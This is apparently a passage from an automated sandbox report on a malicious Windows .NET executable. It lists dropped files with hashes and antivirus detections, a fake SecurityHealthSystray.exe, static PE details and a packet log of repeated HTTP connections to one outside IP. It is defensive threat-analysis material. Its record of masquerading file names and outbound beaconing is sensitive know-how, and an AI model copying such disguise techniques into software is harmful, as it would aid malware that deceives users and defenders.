                                                  Preview:74iocUHnLlZ2xoHS9l2AGXhI211R0uKHlF0af0CtaLtcGNQj4lztFdckXZvkdzxbaRQsyqwJjJk5nEColRXP4bCHmQDGEbPlYSCy6huOypJ53h6SXH9Lbig8PJFimqFH39hVBNsDhIaPSGOFTvs6bDJ0vEjxcMlIjCC49kQKY6oSHRqI59O17Jpzzqj7n5kUgSpQETGseihfZ0seXa2c7uKaWMESBTgdVUwzlaEl3fWZlKa98EjMCIXwHO31PxrKBDJEE237WQicXvzLwFU6tUbM7AsWgNWGyMXhAV5FLm0wj4YWZsFJcuarm7HEKgbJ4cnLXSKaKOuHdonClV7xHMnDvp4DN04pKr1HRM8Ghp9OATN8TFcyinBsykarYHMTTF6wwfvZX1QcMZDbc5tIYGGhpJSqvQsacq44WbLxUCbrXifZh8PcXE5N8ZGnNEoGJ09gfIFAu5xVoZKGo3IwBPCYvq67UhkPYUigj93Z3OrbQjjjOA8U51F3xlvzMIqMVh7T1nhp9t3wikILGXsUiPUhPot8NEMuieFsmPrlcTUL7TVMcjszaVnFNZDM4j

                                                  C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1879040
                                                  Entropy (8bit):7.521285879994311
                                                  Encrypted:false
                                                  SSDEEP:49152:w1AosHXIlkL2txuvX0u4m5r9HOGlJSbYYWl3:w1py/om5r9OhbY9
                                                  MD5:64483E064AA921F94D5B254601DB7C97
                                                  SHA1:7BCEE1F1F12C6CF5707B99F093E639F13FF77338
                                                  SHA-256:C5F0A463FDC02FA0A127A4547BB1DCAF06C679A08C0C9E3452B64AC4101CA50D
                                                  SHA-512:87BAEAB97AD2629661CDCC2C1F1DCA6E40EF102D5E2304E43A96588554E920F6310611C33864883680CBBC3086FCAD50BE304098C1A485C0002890AB5642A93F
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 68%
                                                  • Antivirus: Virustotal, Detection: 55%, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f................................. ........@.. ....................... ............@.................................P...K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.......................................................................0..........(.... ........8........E....)...*.......N...8$...(.... ....~....{....:....& ....8....*(.... ....~....{....:....& ....8....(.... ....~....{z...9....& ....8y......0..-....... ........8........E....).......j...............8$...8.... ....~....{z...9....& ....8........~....(|...~....(.... ....?g... ....~....{....:....& ....8y...~....9.... ....~....{o...9[...& ....8P......... ........88...r...ps....

                                                  C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe:Zone.Identifier

                                                  Download File
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:false
                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                  C:\Windows\System32\CSC2F4CE5DB480645CC91828FC1D1E7D450.TMP

                                                  Download File
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  File Type:MSVC .res
                                                  Category:dropped
                                                  Size (bytes):1224
                                                  Entropy (8bit):4.435108676655666
                                                  Encrypted:false
                                                  SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                  MD5:931E1E72E561761F8A74F57989D1EA0A
                                                  SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                  SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                  SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                  Malicious:false
                                                  Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                  C:\Windows\System32\SecurityHealthSystray.exe

                                                  Download File
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4608
                                                  Entropy (8bit):3.90994357612001
                                                  Encrypted:false
                                                  SSDEEP:48:63pfPtSM7Jt8Bs3FJsdcV4MKe27CsvqBHyOulajfqXSfbNtm:qP5Pc+Vx9MCsvkccjRzNt
                                                  MD5:B5C444B59130533A63B41E962AEA2AF3
                                                  SHA1:336456D697B88F5D0B5D86F934B2262CE3EB4BAA
                                                  SHA-256:56093F784582C3A2C4121224ECE7B667C5EBE75681D55268F419E95F8DCB00A3
                                                  SHA-512:C6FA5F58873A2EA224D2CC361E6B41B20FCC3806D3FF65DF983D079BB39D23C82D3EC5F55C314D051F8D2149D5944EBC2D9000C9927DAAFBD270074D1A213A16
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{6.f............................~'... ...@....@.. ....................................@.................................('..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`'......H.......(!................................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                  \Device\Null

                                                  Download File
                                                  Process:C:\Windows\System32\w32tm.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):151
                                                  Entropy (8bit):4.789858084314967
                                                  Encrypted:false
                                                  SSDEEP:3:VLV993J+miJWEoJ8FXhIjEKNWDIvvpYU3vj:Vx993DEUqK+ISUL
                                                  MD5:D61623E589188C90E12D7D89B0F1BB3C
                                                  SHA1:97DC41BD65C11F3B01587CABBA9D9F18CA47AA16
                                                  SHA-256:9D6B093FDD06232F231C140F11E09B0E1F7DE7CAE1E1C8CBE2C0659B0AB27642
                                                  SHA-512:2B14ADF4DAAF8EFFAFDDD72C66597B955E59D74CDF38955728E25033E03EE673FBE355167BD9C6B71A86BDB0293C715B7675B91635B4BA5A8899439FF459487F
                                                  Malicious:false
                                                  Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 01/08/2024 03:17:18..03:17:18, error: 0x80072746.03:17:23, error: 0x80072746.

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.521285879994311
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Windows Screen Saver (13104/52) 0.07%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  File name:UuIspZT5b6.exe
                                                  File size:1'879'040 bytes
                                                  MD5:64483e064aa921f94d5b254601db7c97
                                                  SHA1:7bcee1f1f12c6cf5707b99f093e639f13ff77338
                                                  SHA256:c5f0a463fdc02fa0a127a4547bb1dcaf06c679a08c0c9e3452b64ac4101ca50d
                                                  SHA512:87baeab97ad2629661cdcc2c1f1dca6e40ef102d5e2304e43a96588554e920f6310611c33864883680cbbc3086fcad50be304098c1a485c0002890ab5642a93f
                                                  SSDEEP:49152:w1AosHXIlkL2txuvX0u4m5r9HOGlJSbYYWl3:w1py/om5r9OhbY9
                                                  TLSH:96959E2A66A24E33C2652B328597413D9291D7372612EF1F361F20D36D07BF58AB71E3
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................... ............@................................

                                                  File Icon

                                                  Icon Hash:90cececece8e8eb0

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x5cc39e
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x6696D1C9 [Tue Jul 16 20:02:17 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1cc3500x4b.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1ce0000x320.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1d00000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000x1ca3a40x1ca400a6bb70be20bb4329aa75b2dad08cf595False0.7739510876977632data7.524831609244645IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rsrc0x1ce0000x3200x400449a56dc03ed673b0449bed8349ccbf0False0.3544921875data2.6537284131589467IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .reloc0x1d00000xc0x200c092225fdaa605bb59ea50ecd5f6db95False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_VERSION0x1ce0580x2c8data0.46207865168539325

                                                  Imports

                                                  DLLImport
                                                  mscoree.dll_CorExeMain

                                                  Network Behavior

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Aug 1, 2024 07:37:25.239263058 CEST4973080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:25.244409084 CEST8049730172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:25.244503975 CEST4973080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:25.244874001 CEST4973080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:25.249814987 CEST8049730172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:25.600461960 CEST4973080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:25.607358932 CEST8049730172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:25.720122099 CEST8049730172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:25.927649975 CEST4973080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:25.988699913 CEST8049730172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:25.988744020 CEST8049730172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:25.988806963 CEST4973080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:26.044601917 CEST4973080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:26.049873114 CEST8049730172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:26.291244984 CEST8049730172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:26.291542053 CEST4973080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:26.297028065 CEST8049730172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:26.309484959 CEST4973380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:26.315975904 CEST8049733172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:26.316131115 CEST4973380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:26.316231012 CEST4973380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:26.321856022 CEST8049733172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:26.533801079 CEST8049730172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:26.564757109 CEST4973080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:26.569890976 CEST8049730172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:26.662242889 CEST4973380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:26.664752007 CEST8049730172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:26.665117979 CEST4973080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:26.667193890 CEST8049733172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:26.670315981 CEST8049730172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:26.670344114 CEST8049730172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:26.770591021 CEST8049733172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:26.880876064 CEST4973380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:26.912446022 CEST8049730172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:27.024302959 CEST4973080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:27.024939060 CEST8049733172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:27.190444946 CEST4973080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:27.191210032 CEST4973680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:27.193293095 CEST4973380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:27.193634033 CEST4973380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:27.196233988 CEST8049736172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:27.196567059 CEST8049730172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:27.196624041 CEST4973680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:27.196661949 CEST4973080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:27.196754932 CEST4973680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:27.199321985 CEST4973680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:27.199857950 CEST8049733172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:27.200047970 CEST4973380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:27.201654911 CEST8049736172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:27.246171951 CEST8049736172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:27.396800995 CEST4973780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:27.401935101 CEST8049737172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:27.402136087 CEST4973780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:27.402259111 CEST4973780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:27.407388926 CEST8049737172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:27.576598883 CEST8049736172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:27.579154968 CEST4973680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:27.755934000 CEST4973780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:27.761130095 CEST8049737172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:27.855858088 CEST8049737172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:28.037168026 CEST4973780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:28.094624043 CEST8049737172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:28.168256998 CEST4973780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:28.277715921 CEST4973780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:28.278536081 CEST4973880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:28.283906937 CEST8049738172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:28.284009933 CEST8049737172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:28.284131050 CEST4973880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:28.284131050 CEST4973780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:28.284131050 CEST4973880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:28.290313959 CEST8049738172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:28.630892992 CEST4973880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:28.636234045 CEST8049738172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:28.729237080 CEST8049738172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:28.943381071 CEST4973880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:28.946094990 CEST8049738172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:28.946288109 CEST4973880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:28.982858896 CEST8049738172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:29.129616976 CEST4974080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:29.130883932 CEST4973880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:29.134763956 CEST8049740172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:29.135159969 CEST4974080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:29.135257959 CEST4974080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:29.141453028 CEST8049740172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:29.490343094 CEST4974080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:29.495759964 CEST8049740172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:29.601708889 CEST8049740172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:29.729964018 CEST4974080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:29.894970894 CEST8049740172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:30.037194967 CEST4974080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:30.148761988 CEST4974080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:30.149401903 CEST4974280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:30.154402018 CEST8049740172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:30.154413939 CEST8049742172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:30.154490948 CEST4974280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:30.154578924 CEST4974080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:30.154596090 CEST4974280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:30.159342051 CEST8049742172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:30.505877018 CEST4974280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:30.511138916 CEST8049742172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:30.608850002 CEST8049742172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:30.693253994 CEST4974280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:30.858093023 CEST8049742172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:30.988986969 CEST4973880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:30.997405052 CEST4974280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:30.998298883 CEST4974380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:31.002799034 CEST8049742172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:31.003056049 CEST4974280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:31.003621101 CEST8049743172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:31.003865004 CEST4974380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:31.003865004 CEST4974380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:31.008740902 CEST8049743172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:31.349776983 CEST4974380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:31.355061054 CEST8049743172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:31.448272943 CEST8049743172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:31.537141085 CEST4974380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:31.726249933 CEST8049743172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:31.833883047 CEST4974380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:31.854752064 CEST4974380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:31.855628014 CEST4974480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:31.860133886 CEST8049743172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:31.860220909 CEST4974380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:31.860672951 CEST8049744172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:31.860893965 CEST4974480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:31.860893965 CEST4974480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:31.865895033 CEST8049744172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:31.928802967 CEST4974480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:31.929277897 CEST4974580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:31.934380054 CEST8049745172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:31.934628963 CEST4974580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:31.934628963 CEST4974580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:31.939671040 CEST8049745172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:31.978306055 CEST8049744172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:32.057678938 CEST4974680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:32.062757015 CEST8049746172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:32.063024998 CEST4974680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:32.063025951 CEST4974680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:32.067948103 CEST8049746172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:32.218012094 CEST8049744172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:32.218209028 CEST4974480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:32.365102053 CEST4974580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:32.370361090 CEST8049745172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:32.370486021 CEST8049745172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:32.398417950 CEST8049745172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:32.412626982 CEST4974680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:32.417828083 CEST8049746172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:32.490156889 CEST4974580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:32.512762070 CEST8049746172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:32.693381071 CEST4974680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:32.761178970 CEST8049746172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:32.768405914 CEST8049745172.67.203.2192.168.2.4
